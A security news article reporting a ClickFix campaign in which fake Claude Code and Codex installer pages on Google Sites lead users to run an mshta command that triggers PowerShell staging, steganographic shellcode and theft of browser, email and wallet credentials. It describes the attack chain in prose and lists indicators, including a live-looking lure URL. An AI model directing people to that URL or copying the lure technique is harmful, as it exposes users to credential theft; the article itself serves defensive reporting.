Cybercriminals have found a new and clever way to exploit the growing popularity of AI developer tools.
A recently identified campaign uses fake pages mimicking Claude Code and OpenAI Codex, hosted on trusted Google Sites infrastructure, to trick users into running commands that quietly steal their credentials and other sensitive personal data from their devices.
The attack follows a technique known as ClickFix, where victims are shown what looks like a legitimate setup page and told to execute a short command.
There is no file downloaded in the traditional sense. Instead, the entire malicious operation runs silently in memory, making it much harder for standard security tools to catch it in the act.
Analysts at ANY.RUN said in a report shared with Cyber Security News (CSN) that they identified this active ClickFix campaign impersonating popular AI tools, including both Codex and Claude.
The researchers noted that because network activity appears as normal PowerShell traffic, the attack can significantly reduce visibility during the earliest stages of a system compromise.
What makes this campaign stand out is how well it blends in. Google Sites pages carry the trust of a legitimate Google domain, and most users would not think twice before following instructions on such a page.
𝗙𝗮𝗸𝗲 𝗖𝗹𝗮𝘂𝗱𝗲 & 𝗖𝗼𝗱𝗲𝘅 𝗗𝗲𝗹𝗶𝘃𝗲𝗿 𝗜𝗻-𝗠𝗲𝗺𝗼𝗿𝘆 𝗦𝘁𝗲𝗮𝗹𝗲𝗿: 𝗖𝗹𝗶𝗰𝗸𝗙𝗶𝘅 𝘃𝗶𝗮 𝗚𝗼𝗼𝗴𝗹𝗲 𝗦𝗶𝘁𝗲𝘀
We’re tracking a #ClickFix campaign that mimics popular AI tools, including Codex and Claude, and abuses trusted Google Sites infrastructure… pic.twitter.com/BeiU03Stua— ANY.RUN (@anyrun_app) June 3, 2026
The combination of a trusted hosting platform, a convincing lure, and a fully in-memory payload gives attackers a meaningful advantage over the people they target.
The impact of such an attack can be severe. Stolen data includes saved browser passwords, email credentials, and cryptocurrency wallet information, all of which are sent to attacker-controlled servers.
Developers and professionals who regularly work with AI coding tools are at particular risk, since they are the most likely to follow command-line installation instructions without hesitation.
Fake Claude Code Installer Via Google Sites
Victims are directed to a Google Sites page designed to look like a legitimate Claude Code or Codex installation guide.
Once there, they are told to execute an mshta command, a built-in Windows utility, to complete the setup process. That single action is all it takes to kick off the entire attack chain.
From there, a multi-stage PowerShell sequence begins running in the background. One of the more technically interesting elements of this campaign is the use of steganography, where the malicious payload is hidden inside an image file and extracted only at runtime.
This shellcode is then deployed and executed entirely inside a running PowerShell process, never touching the disk in a way that traditional antivirus tools would flag.
The execution chain moves quickly and quietly: the Google Sites lure leads to the mshta command, which triggers PowerShell staging, which then extracts a hidden payload from an image, and finally runs shellcode in memory before pulling browser data, email credentials, and wallet information and exfiltrating everything to a remote attacker-controlled server.
Steganography and In-Memory Execution
The use of steganography in this campaign reflects a broader shift in how attackers are designing their tools.
By hiding shellcode inside image pixels rather than using standalone executable files, the attackers reduce the number of artifacts left behind on a victim’s machine. Security Operations Center teams are left with very little to investigate after the fact.
Since the malicious process runs inside a legitimate Windows program like PowerShell, network monitoring tools may interpret the outbound traffic as entirely routine activity.
This level of operational camouflage is part of what makes this campaign particularly difficult to defend against without behavioral detection in place.
Security researchers recommend treating any webpage that asks you to copy and paste a command with a high level of suspicion, even if the site looks official.
Users should always verify installation instructions through a tool’s official documentation or its original GitHub repository rather than following prompts from search results or unfamiliar websites.
Organizations should also deploy endpoint detection tools capable of behavioral analysis, which can identify suspicious PowerShell activity even when no traditional malware file is written to disk.
Indicators of Compromise (IoCs):-
The source material did not include specific file hashes, IP addresses, or domains in directly extractable form.
However, the ANY.RUN sandbox analysis sessions referenced in the source provide the following trackable artifacts:
TypeIndicatorDescriptionURLsites.google.com/view/clau-ver-un-24Google Sites lure page impersonating Claude Code installerURLapp.any.run/tasks/698e0bd5-01b6-40fe-814c-5c0885cea645ANY.RUN sandbox analysis session for Claude lureURLapp.any.run/tasks/151cfb30ANY.RUN sandbox analysis session for Codex lureProcessmshta.exeWindows utility abused to initiate the ClickFix attack chainProcesspowershell.exeUsed for multi-stage payload delivery and in-memory shellcode executionTacticClickFix via Google SitesSocial engineering lure directing victims to execute mshta commandData TargetBrowser, email, crypto walletsCategories of credentials stolen and exfiltrated to C2 infrastructure
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Fake Claude Code Installer Via Google Sites Deliver Credential-Stealing Malware appeared first on Cyber Security News.
